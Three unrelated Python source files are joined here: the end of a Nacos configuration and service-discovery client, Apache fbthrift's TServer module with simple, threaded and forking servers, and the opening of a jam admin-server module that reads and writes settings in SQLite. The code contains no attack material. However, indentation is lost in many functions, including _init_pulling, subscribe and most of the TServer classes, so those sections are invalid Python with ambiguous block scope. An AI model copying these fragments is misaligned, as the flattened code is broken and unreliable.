        logger.debug("[do-sync-req] %s maybe down, skip to next" % server)
def _do_pulling(self, cache_list, queue):
    """Long-poll worker loop (runs in its own process, or thread on Windows).

    Maintains a CacheData per watched key, posts the md5 probe string to
    the server's listener endpoint, and for every key the server reports
    changed re-fetches the config and pushes (key, content, md5) onto
    *queue* for _process_polling_result.

    Parameters
    ----------
    cache_list : shared list of cache keys (may grow/shrink while running)
    queue : queue for change notifications
    """
    cache_pool = dict()
    for cache_key in cache_list:
        cache_pool[cache_key] = CacheData(cache_key, self)
    while cache_list:
        # reconcile the local cache pool with the (shared) key list
        unused_keys = set(cache_pool.keys())
        contains_init_key = False
        probe_update_string = ""
        for cache_key in cache_list:
            cache_data = cache_pool.get(cache_key)
            if not cache_data:
                logger.debug("[do-pulling] new key added: %s" % cache_key)
                cache_data = CacheData(cache_key, self)
                cache_pool[cache_key] = cache_data
            else:
                unused_keys.remove(cache_key)
            if cache_data.is_init:
                contains_init_key = True
            data_id, group, namespace = parse_key(cache_key)
            probe_update_string += WORD_SEPARATOR.join(
                [data_id, group, cache_data.md5 or "", self.namespace]) + LINE_SEPARATOR
        for k in unused_keys:
            logger.debug("[do-pulling] %s is no longer watched, remove from cache" % k)
            cache_pool.pop(k)
        logger.debug(
            "[do-pulling] try to detected change from server probe string is %s" % truncate(probe_update_string))
        headers = {"Long-Pulling-Timeout": int(self.pulling_timeout * 1000)}
        # if contains_init_key:
        #     headers["longPullingNoHangUp"] = "true"
        data = {"Listening-Configs": probe_update_string}
        changed_keys = list()
        try:
            # allow 10s of slack beyond the server-side hang time
            resp = self._do_sync_req("/nacos/v1/cs/configs/listener", headers, None, data,
                                     self.pulling_timeout + 10, "POST")
            changed_keys = [group_key(*i) for i in parse_pulling_result(resp.read())]
            logger.debug("[do-pulling] following keys are changed from server %s" % truncate(str(changed_keys)))
        except NacosException as e:
            logger.error("[do-pulling] nacos exception: %s, waiting for recovery" % str(e))
            time.sleep(1)
        except Exception as e:
            logger.exception("[do-pulling] exception %s occur, return empty list, waiting for recovery" % str(e))
            time.sleep(1)
        for cache_key, cache_data in cache_pool.items():
            cache_data.is_init = False
            if cache_key in changed_keys:
                data_id, group, namespace = parse_key(cache_key)
                content = self.get_config(data_id, group)
                cache_data.md5 = NacosClient.get_md5(content)
                cache_data.content = content
                queue.put((cache_key, cache_data.content, cache_data.md5))
@synchronized_with_attr("pulling_lock")
def _init_pulling(self):
if self.puller_mapping is not None:
logger.info("[init-pulling] puller is already initialized")
return
self.puller_mapping = dict()
self.notify_queue = Queue()
self.callback_tread_pool = pool.ThreadPool(self.callback_thread_num)
self.process_mgr = Manager()
t = Thread(target=self._process_polling_result)
t.setDaemon(True)
t.start()
logger.info("[init-pulling] init completed")
def _process_polling_result(self):
    """Notifier loop: dispatch change events from notify_queue to watchers.

    For each (cache_key, content, md5) event, every watcher whose
    last_md5 differs is invoked with a params dict (via the callback
    thread pool, synchronously) and then marked up to date.  Runs forever
    on a daemon thread.
    """
    while True:
        cache_key, content, md5 = self.notify_queue.get()
        logger.debug("[process-polling-result] receive an event:%s" % cache_key)
        wl = self.watcher_mapping.get(cache_key)
        if not wl:
            logger.debug("[process-polling-result] no watcher on %s, ignored" % cache_key)
            continue
        data_id, group, namespace = parse_key(cache_key)
        plain_content = content
        params = {
            "data_id": data_id,
            "group": group,
            "namespace": namespace,
            "raw_content": content,
            "content": plain_content,
        }
        for watcher in wl:
            if not watcher.last_md5 == md5:
                logger.debug(
                    "[process-polling-result] md5 changed since last call, calling %s with changed params: %s"
                    % (watcher.callback.__name__, params))
                try:
                    # apply() blocks until the callback returns
                    self.callback_tread_pool.apply(watcher.callback, (params,))
                except Exception as e:
                    logger.exception("[process-polling-result] exception %s occur while calling %s " % (
                        str(e), watcher.callback.__name__))
                watcher.last_md5 = md5
def _get_common_headers(self, params, data):
    """Build authentication headers for a request.

    Returns {} when ak/sk auth is disabled.  Otherwise adds
    Spas-AccessKey, a millisecond timestamp, and an HMAC-SHA1 signature
    (base64) over "tenant+group+timestamp", omitting whichever of tenant
    and group is missing from *params*/*data*.
    """
    headers = {}
    if self.auth_enabled:
        ts = str(int(time.time() * 1000))
        ak, sk = self.ak, self.sk
        headers.update({
            "Spas-AccessKey": ak,
            "timeStamp": ts,
        })
        sign_str = ""
        # in case tenant or group is null
        if not params and not data:
            return headers
        tenant = (params and params.get("tenant")) or (data and data.get("tenant"))
        group = (params and params.get("group")) or (data and data.get("group"))
        if tenant:
            sign_str = tenant + "+"
        if group:
            sign_str = sign_str + group + "+"
        if sign_str:
            sign_str += ts
            headers["Spas-Signature"] = base64.encodebytes(
                hmac.new(sk.encode(), sign_str.encode(), digestmod=hashlib.sha1).digest()).decode().strip()
    return headers
def _build_metadata(self, metadata, params):
if metadata:
if isinstance(metadata, dict):
params["metadata"] = json.dumps(metadata)
else:
params["metadata"] = metadata
def add_naming_instance(self, service_name, ip, port, cluster_name=None, weight=1.0, metadata=None,
                        enable=True, healthy=True, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
    """Register one instance of a service with the naming server.

    Returns True when the server answers b"ok".  HTTP errors are mapped to
    NacosException (403 becomes "Insufficient privilege."); anything else is
    logged and re-raised.
    """
    logger.info("[add-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
        ip, port, service_name, self.namespace))
    # clusterName is sent unconditionally (it may be None), matching the
    # original call contract for this endpoint
    params = dict(
        ip=ip,
        port=port,
        serviceName=service_name,
        weight=weight,
        enable=enable,
        healthy=healthy,
        clusterName=cluster_name,
        ephemeral=ephemeral,
        groupName=group_name,
    )
    self._build_metadata(metadata, params)
    if self.namespace:
        params["namespaceId"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "POST")
        body = resp.read()
        logger.info("[add-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
            ip, port, service_name, self.namespace, body))
        return body == b"ok"
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[add-naming-instance] exception %s occur" % str(e))
        raise
def remove_naming_instance(self, service_name, ip, port, cluster_name=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
    """Deregister one instance of a service from the naming server.

    Returns True when the server answers b"ok".  HTTP errors are mapped to
    NacosException (403 becomes "Insufficient privilege."); anything else is
    logged and re-raised.
    """
    logger.info("[remove-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
        ip, port, service_name, self.namespace))
    params = dict(
        ip=ip,
        port=port,
        serviceName=service_name,
        ephemeral=ephemeral,
        groupName=group_name,
    )
    # unlike add_naming_instance, the cluster name is only sent when given
    if cluster_name is not None:
        params["clusterName"] = cluster_name
    if self.namespace:
        params["namespaceId"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "DELETE")
        body = resp.read()
        logger.info("[remove-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
            ip, port, service_name, self.namespace, body))
        return body == b"ok"
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[remove-naming-instance] exception %s occur" % str(e))
        raise
def modify_naming_instance(self, service_name, ip, port, cluster_name=None, weight=None, metadata=None,
                           enable=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
    """Update mutable attributes (cluster/enable/weight/metadata) of a registered instance.

    Optional arguments left as None are omitted from the request so their
    server-side values are preserved.  Returns True when the server answers
    b"ok".  HTTP errors are mapped to NacosException; anything else is
    logged and re-raised.
    """
    logger.info("[modify-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
        ip, port, service_name, self.namespace))
    params = dict(
        ip=ip,
        port=port,
        serviceName=service_name,
        ephemeral=ephemeral,
        groupName=group_name,
    )
    # include only the optional attributes the caller explicitly provided
    for key, value in (("clusterName", cluster_name), ("enable", enable), ("weight", weight)):
        if value is not None:
            params[key] = value
    self._build_metadata(metadata, params)
    if self.namespace:
        params["namespaceId"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "PUT")
        body = resp.read()
        logger.info("[modify-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
            ip, port, service_name, self.namespace, body))
        return body == b"ok"
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[modify-naming-instance] exception %s occur" % str(e))
        raise
def list_naming_instance(self, service_name, clusters=None, namespace_id=None, group_name=None, healthy_only=False):
    """List the instances registered under a service.

    :param service_name: service name
    :param clusters: cluster name(s); comma-separated string for multiple clusters
    :param namespace_id: namespace id; defaults to the client's namespace
    :param group_name: group name; defaults to 'DEFAULT_GROUP'
    :param healthy_only: when True only healthy instances are returned (default False)
    :return: decoded JSON response from the naming server
    :raises NacosException: on HTTP errors (403 maps to "Insufficient privilege.")
    """
    logger.info("[list-naming-instance] service_name:%s, namespace:%s" % (service_name, self.namespace))
    params = {
        "serviceName": service_name,
        "healthyOnly": healthy_only
    }
    if clusters is not None:
        params["clusters"] = clusters
    namespace_id = namespace_id or self.namespace
    if namespace_id:
        params["namespaceId"] = namespace_id
    # the `or` fallback makes group_name always truthy, so the previous
    # `if group_name:` guard was dead code and has been removed
    params['groupName'] = group_name or 'DEFAULT_GROUP'
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance/list", None, params, None, self.default_timeout, "GET")
        c = resp.read()
        logger.info("[list-naming-instance] service_name:%s, namespace:%s, server response:%s" %
                    (service_name, self.namespace, c))
        return json.loads(c.decode("UTF-8"))
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        else:
            raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[list-naming-instance] exception %s occur" % str(e))
        raise
def get_naming_instance(self, service_name, ip, port, cluster_name=None):
    """Fetch the detail record of one registered instance.

    Returns the decoded JSON document from the naming server.  HTTP errors
    are mapped to NacosException; anything else is logged and re-raised.
    """
    logger.info("[get-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (ip, port, service_name,
                                                                                        self.namespace))
    params = dict(serviceName=service_name, ip=ip, port=port)
    if cluster_name is not None:
        # both spellings are populated -- presumably for compatibility across
        # server versions; verify before removing either one
        params["cluster"] = cluster_name
        params["clusterName"] = cluster_name
    if self.namespace:
        params["namespaceId"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance", None, params, None, self.default_timeout, "GET")
        body = resp.read()
        logger.info("[get-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" %
                    (ip, port, service_name, self.namespace, body))
        return json.loads(body.decode("UTF-8"))
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[get-naming-instance] exception %s occur" % str(e))
        raise
def send_heartbeat(self, service_name, ip, port, cluster_name=None, weight=1.0, metadata=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
    """Send a client-side heartbeat for a registered instance.

    The beat document is JSON-encoded into the "beat" query parameter.
    Returns the decoded JSON response of the beat endpoint.  HTTP errors are
    mapped to NacosException; anything else is logged and re-raised.
    """
    logger.info("[send-heartbeat] ip:%s, port:%s, service_name:%s, namespace:%s" % (ip, port, service_name,
                                                                                   self.namespace))
    beat_data = {
        "serviceName": service_name,
        "ip": ip,
        "port": port,
        "weight": weight,
        "ephemeral": ephemeral
    }
    if cluster_name is not None:
        beat_data["cluster"] = cluster_name
    if metadata is not None:
        # string metadata arrives as a JSON document; embed it decoded
        beat_data["metadata"] = json.loads(metadata) if isinstance(metadata, str) else metadata
    params = {
        "serviceName": service_name,
        "beat": json.dumps(beat_data),
        "groupName": group_name
    }
    if self.namespace:
        params["namespaceId"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/ns/instance/beat", None, params, None, self.default_timeout, "PUT")
        body = resp.read()
        logger.info("[send-heartbeat] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" %
                    (ip, port, service_name, self.namespace, body))
        return json.loads(body.decode("UTF-8"))
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[send-heartbeat] exception %s occur" % str(e))
        raise
def subscribe(self,
listener_fn, listener_interval=7, *args, **kwargs):
"""
reference at `/nacos/v1/ns/instance/list` in https://nacos.io/zh-cn/docs/open-api.html
:param listener_fn: listener callback(s); may be a tuple, a list, or a single callable
:param listener_interval: polling interval, in seconds, between OpenAPI HTTP requests
:return:
"""
service_name = kwargs.get("service_name")
if not service_name:
if len(args) > 0:
service_name = args[0]
else:
raise NacosException("`service_name` is required in subscribe")
self.subscribed_local_manager.add_local_listener(key=service_name, listener_fn=listener_fn)
# track whether this is the first subscribe invocation
class _InnerSubContext(object):
first_sub = True
def _compare_and_trigger_listener():
# invoke `list_naming_instance`
latest_res = self.list_naming_instance(*args, **kwargs)
latest_instances = latest_res['hosts']
# fetch the locally cached instances for this service
local_service_instances_dict = self.subscribed_local_manager.get_local_instances(service_name)
# nothing cached locally yet, so every returned instance is treated as new
if not local_service_instances_dict:
if not latest_instances or len(latest_instances) < 1:
# the first subscribe invocation does not notify
if _InnerSubContext.first_sub:
_InnerSubContext.first_sub = False
return
for instance in latest_instances:
slc = SubscribedLocalInstance(key=service_name, instance=instance)
self.subscribed_local_manager.add_local_instance(slc)
# the first subscribe invocation does not notify
# NOTE(review): flattened formatting makes the scope of this early return
# ambiguous relative to the launch call below -- verify which ADDED
# notifications it suppresses against the upstream SDK
if _InnerSubContext.first_sub:
_InnerSubContext.first_sub = False
return
self.subscribed_local_manager.do_listener_launch(service_name, Event.ADDED, slc)
else:
local_service_instances_dict_copy = local_service_instances_dict.copy()
for instance in latest_instances:
slc = SubscribedLocalInstance(key=service_name, instance=instance)
local_slc = local_service_instances_dict.get(slc.instance_id)
# instance not cached locally yet: report it as ADDED
if local_slc is None:
self.subscribed_local_manager.add_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.ADDED, slc)
# instance already cached locally
else:
local_slc_md5 = local_slc.md5
local_slc_id = local_slc.instance_id
local_service_instances_dict_copy.pop(local_slc_id)
# compare md5 digests; a mismatch means the instance changed
if local_slc_md5 != slc.md5:
self.subscribed_local_manager.remove_local_instance(local_slc).add_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.MODIFIED, slc)
# still have instances in local marked deleted
if len(local_service_instances_dict_copy) > 0:
for local_slc_id, slc in local_service_instances_dict_copy.items():
self.subscribed_local_manager.remove_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.DELETED, slc)
# poll the OpenAPI endpoint periodically so changes keep flowing to listeners
timer_name = 'service-subscribe-timer-{key}'.format(key=service_name)
subscribe_timer = NacosTimer(name=timer_name,
interval=listener_interval,
fn=_compare_and_trigger_listener)
subscribe_timer.scheduler()
self.subscribe_timer_manager.add_timer(subscribe_timer)
def unsubscribe(self, service_name, listener_name=None):
    """Remove subscription listeners registered for *service_name*.

    :param service_name: service whose listeners should be removed
    :param listener_name: when given, remove only that listener;
        otherwise drop every listener for the service
    :return: None
    """
    manager = self.subscribed_local_manager.get_local_listener_manager(key=service_name)
    if not manager:
        return
    if listener_name:
        manager.remove_listener(listener_name)
    else:
        manager.empty_listeners()
def stop_subscribe(self):
    """Halt the background subscription scheduler (all service polling timers).

    :return: None
    """
    self.subscribe_timer_manager.stop()
# Enable verbose client logging at import time when the module-level DEBUG flag is set.
if DEBUG:
NacosClient.set_debugging()
|
TServer.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import sys
import os
import threading
if sys.version_info[0] >= 3:
import queue
Queue = queue
else:
import Queue
import warnings
from nebula2.fbthrift.Thrift import TProcessor, TApplicationException
from nebula2.fbthrift.transport import TTransport
from nebula2.fbthrift.protocol import TBinaryProtocol
from nebula2.fbthrift.protocol.THeaderProtocol import THeaderProtocolFactory
class TConnectionContext:
    """Abstract base describing a single client connection."""

    def getPeerName(self):
        """Return the client address.

        Returns:
          The equivalent value of socket.getpeername() on the client socket.
          Concrete subclasses must override this.
        """
        raise NotImplementedError
class TRpcConnectionContext(TConnectionContext):
    """Per-call connection context handed to thrift RPC processors."""

    def __init__(self, client_socket, iprot=None, oprot=None):
        """Remember the client socket and, optionally, its protocol pair.

        Arguments:
          client_socket: the TSocket connected to the client
        """
        self._client_socket = client_socket
        self.iprot, self.oprot = iprot, oprot

    def setProtocols(self, iprot, oprot):
        # attach (or replace) the input/output protocols for this connection
        self.iprot, self.oprot = iprot, oprot

    def getPeerName(self):
        """Return the client address.

        Returns:
          Same value as socket.peername() for the TSocket.
        """
        return self._client_socket.getPeerName()

    def getSockName(self):
        """Return the server-side address.

        Returns:
          Same value as socket.getsockname() for the TSocket.
        """
        return self._client_socket.getsockname()
class TServerEventHandler:
    """Event handler base class.

    Subclass and override selected methods to hook server lifecycle events;
    every default implementation is a no-op.
    """

    def preServe(self, address):
        """Called once per listening address before the server begins.

        Arguments:
          address: the address that the server is listening on
        """
        pass

    def newConnection(self, context):
        """Called when a client has connected, before request processing.

        Arguments:
          context: instance of TRpcConnectionContext
        """
        pass

    def clientBegin(self, iprot, oprot):
        """Deprecated hook fired alongside newConnection.

        For all servers other than TNonblockingServer this is called whenever
        newConnection is called and vice versa; TNonblockingServer does not
        support it.  New code should override newConnection instead.
        """
        pass

    def connectionDestroyed(self, context):
        """Called when a client has finished request handling.

        Arguments:
          context: instance of TRpcConnectionContext
        """
        pass
class TServer:
"""Base interface for a server, which must have a serve method."""
""" constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
Optionally, the handler can be passed instead of the processor,
and a processor will be created automatically:
4) (handler, serverTransport)
5) (handler, serverTransport, transportFacotry, protocolFactory)
6) (handler, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
The attribute serverEventHandler (default: None) receives
callbacks for various events in the server lifecycle. It should
be set to an instance of TServerEventHandler.
"""
def __init__(self, *args):
# dispatch on positional-argument count (forms 1-6 in the class docstring);
# NOTE(review): an unsupported count falls through silently, leaving the
# server unconfigured -- do not rely on the constructor for validation
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
# one transport factory and one protocol factory, shared by input and output
self.__initArgs__(args[0], args[1], args[2], args[2], args[3],
args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4],
args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
# store the fully-expanded configuration; `processor` may also be a handler,
# in which case _getProcessor wraps it in its declared processor type
self.processor = self._getProcessor(processor)
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
self.serverEventHandler = TServerEventHandler()
def _getProcessor(self, processor):
""" Check if a processor is really a processor, or if it is a handler
auto create a processor for it """
if isinstance(processor, TProcessor):
return processor
elif hasattr(processor, "_processor_type"):
# generated handlers advertise their processor class via _processor_type
handler = processor
return handler._processor_type(handler)
else:
raise TApplicationException(
message="Could not detect processor type")
def setServerEventHandler(self, handler):
# replace the default (no-op) lifecycle event handler
self.serverEventHandler = handler
def _clientBegin(self, context, iprot, oprot):
# fire both the new-style and the deprecated connection callbacks
self.serverEventHandler.newConnection(context)
self.serverEventHandler.clientBegin(iprot, oprot)
def handle(self, client):
"""Service one accepted client connection until it disconnects."""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory, THeaderProtocolFactory):
# for THeaderProtocol the same protocol object serves both directions
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
context = TRpcConnectionContext(client, iprot, oprot)
self._clientBegin(context, iprot, oprot)
try:
# process requests until the client closes the transport
while True:
self.processor.process(iprot, oprot, context)
except TTransport.TTransportException:
# normal end of connection
pass
except Exception as x:
logging.exception(x)
self.serverEventHandler.connectionDestroyed(context)
itrans.close()
otrans.close()
def serve(self):
# subclasses implement the accept loop
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
# deprecated: kept only for backwards compatibility
warnings.warn("TSimpleServer is deprecated. Please use one of "
"Nonblocking, Twisted, or Gevent server instead.",
DeprecationWarning)
TServer.__init__(self, *args)
def serve(self):
"""Accept and fully service one connection at a time, forever."""
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
# blocking accept loop: each client is handled to completion before the
# next accept, so one slow client stalls the whole server
while True:
client = self.serverTransport.accept()
self.handle(client)
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
# daemon=True lets the process exit without joining live handler threads
self.daemon = kwargs.get("daemon", False)
def serve(self):
"""Accept connections forever, servicing each on its own thread."""
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
while True:
try:
client = self.serverTransport.accept()
t = threading.Thread(target=self.handle, args=(client,))
t.daemon = self.daemon
t.start()
except KeyboardInterrupt:
# let Ctrl-C stop the accept loop instead of being swallowed below
raise
except Exception as x:
logging.exception(x)
class TForkingServer(TServer):
"""A Thrift server that forks a new process for each request"""
"""
This is more scalable than the threaded server as it does not cause
GIL contention.
Note that this has different semantics from the threading server.
Specifically, updates to shared variables will no longer be shared.
It will also not work on windows.
This code is heavily inspired by SocketServer.ForkingMixIn in the
Python stdlib.
"""
def __init__(self, *args):
TServer.__init__(self, *args)
# pids of forked children that have not been reaped yet
self.children = []
def serve(self):
"""Accept connections forever, forking one child process per client."""
def tryClose(file):
# best-effort close; a failed close is logged, never raised
try:
file.close()
except IOError as e:
logging.warning(e, exc_info=True)
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
while True:
client = self.serverTransport.accept()
try:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory,
THeaderProtocolFactory):
# for THeaderProtocol one protocol object serves both directions
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
context = TRpcConnectionContext(client, iprot, oprot)
self._clientBegin(context, iprot, oprot)
pid = os.fork()
if pid: # parent
# add before collect, otherwise you race w/ waitpid
self.children.append(pid)
self._collectChildren()
# Parent must close socket or the connection may not get
# closed promptly
tryClose(itrans)
tryClose(otrans)
else:
# child: service this one client to completion, then _exit so the
# parent's cleanup handlers are not run a second time
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot, context)
except TTransport.TTransportException:
# normal disconnect
pass
except Exception as e:
logging.exception(e)
ecode = 1
finally:
self.serverEventHandler.connectionDestroyed(context)
tryClose(itrans)
tryClose(otrans)
os._exit(ecode)
except TTransport.TTransportException:
pass
except Exception as x:
logging.exception(x)
def _collectChildren(self):
# non-blocking reap (WNOHANG) of any children that have already exited
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except os.error:
pid = None
if pid:
self.children.remove(pid)
else:
break
|
adm_server.py | import os
import json
import hashlib
import datetime
import time
import zipfile
import shutil
import traceback
import sqlite3
import zlib
import base64
from threading import Thread, Lock
from operator import itemgetter
from esprima import parseScript, nodes
import jam.common as common
from jam.common import error_message, file_read, file_write
import jam.db.db_modules as db_modules
from jam.server_classes import *
from jam.events import get_events
from jam.execute import execute_sql
import jam.langs as langs
from werkzeug._compat import iteritems, iterkeys, to_unicode, to_bytes, text_type, string_types
def read_language(task):
    """Return the interface language id stored in SYS_PARAMS.

    Opens a fresh connection via ``task.create_connection()``, reads the
    F_LANGUAGE column and falls back to 1 when the table is empty or the
    stored value is NULL/0.  The connection is always rolled back and closed.
    """
    con = task.create_connection()
    try:
        cur = con.cursor()
        cur.execute('SELECT F_LANGUAGE FROM SYS_PARAMS')
        rows = cur.fetchall()
    finally:
        con.rollback()
        con.close()
    lang = rows[0][0] if rows else None
    return lang if lang else 1
def read_setting(task):
    """Load every setting column of SYS_PARAMS into common.SETTINGS.

    A single SELECT fetches one F_<KEY> column per key of
    common.DEFAULT_SETTINGS.  NULL columns and values that fail conversion
    to the default's type fall back to the default.  Each resulting setting
    is also published as an attribute on the ``common`` module.
    """
    keys = list(iterkeys(common.DEFAULT_SETTINGS))
    sql = 'SELECT ' + ', '.join('F_%s' % key for key in keys) + ' FROM SYS_PARAMS'
    con = task.create_connection()
    try:
        cursor = con.cursor()
        cursor.execute(sql)
        rows = cursor.fetchall()
    finally:
        con.rollback()
        con.close()
    record = rows[0]
    common.SETTINGS = {}
    for i, key in enumerate(keys):
        # coerce the stored value to the type of the shipped default
        target_type = type(common.DEFAULT_SETTINGS[key])
        try:
            if record[i] is None:
                common.SETTINGS[key] = common.DEFAULT_SETTINGS[key]
            else:
                common.SETTINGS[key] = target_type(record[i])
        except:
            common.SETTINGS[key] = common.DEFAULT_SETTINGS[key]
    # mirror the settings as module attributes for convenient access
    for key in iterkeys(common.SETTINGS):
        common.__dict__[key] = common.SETTINGS[key]
def write_setting(task):
    """Persist every value of common.SETTINGS back to the SYS_PARAMS row.

    Booleans are stored as 0/1, string settings are double-quoted, everything
    else is embedded as-is.  The write stays best-effort: on failure the
    transaction is rolled back and the error is printed instead of raised.

    NOTE: values are interpolated directly into the UPDATE statement (no
    parameter binding).  This is tolerable only because settings originate
    from the admin UI, not from untrusted input -- kept as-is.
    """
    assignments = []
    for key in iterkeys(common.DEFAULT_SETTINGS):
        value = common.SETTINGS[key]
        setting_type = type(common.DEFAULT_SETTINGS[key])
        if setting_type == bool:
            value = 1 if value else 0
        if setting_type in string_types:
            assignments.append('F_%s="%s"' % (key, value))
        else:
            assignments.append('F_%s=%s' % (key, value))
    sql = 'UPDATE SYS_PARAMS SET ' + ', '.join(assignments)
    con = task.create_connection()
    try:
        cursor = con.cursor()
        cursor.execute(sql)
        con.commit()
    except Exception:
        # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # propagate; the failure is now at least made visible before rollback
        traceback.print_exc()
        con.rollback()
    finally:
        con.close()
def get_value_list(str_list, order=False):
    """Pair each string with its 1-based position: [[1, s1], [2, s2], ...].

    When *order* is True the pairs are sorted by the string value while the
    original position numbers are preserved.
    """
    pairs = [[index, text] for index, text in enumerate(str_list, start=1)]
    if order:
        pairs.sort(key=itemgetter(1))
    return pairs
def create_items(task):
task.items = []
task.sys_catalogs = Group(task, task, 'catalogs', task.language('catalogs'))
task.sys_tables = Group(task, task, 'tables', task.language('details'), visible=False)
task.sys_items = task.sys_catalogs.add_catalog('sys_items', 'Items', 'SYS_ITEMS')
task.sys_fields = task.sys_tables.add_table('sys_fields', task.language('fields'), 'SYS_FIELDS')
task.sys_params = task.sys_catalogs.add_catalog('sys_params', '', 'SYS_PARAMS')
task.sys_langs = task.sys_catalogs.add_catalog('sys_langs', 'Languages', 'SYS_LANGS')
task.sys_params.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_params.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_params.add_field(3, 'f_safe_mode', task.language('safe_mode'), common.BOOLEAN)
task.sys_params.add_field(4, 'f_debugging', task.language('debugging'), common.BOOLEAN, edit_visible=False)
task.sys_params.add_field(5, 'f_con_pool_size', task.language('con_pool_size'), common.INTEGER, required=False)
task.sys_params.add_field(6, 'f_language', task.language('language'), common.INTEGER, True, task.sys_langs, 'f_name', enable_typeahead=True)
task.sys_params.add_field(7, 'f_version', task.language('version'), common.TEXT, size = 256)
task.sys_params.add_field(8, 'f_mp_pool', task.language('mp_pool'), common.BOOLEAN)
task.sys_params.add_field(9, 'f_persist_con', task.language('persist_con'), common.BOOLEAN)
task.sys_params.add_field(10, 'f_single_file_js', task.language('single_file_js'), common.BOOLEAN)
task.sys_params.add_field(11, 'f_dynamic_js', task.language('dynamic_js'), common.BOOLEAN)
task.sys_params.add_field(12, 'f_compressed_js', task.language('compressed_js'), common.BOOLEAN)
task.sys_params.add_field(13, 'f_field_id_gen', 'f_field_id_gen', common.INTEGER)
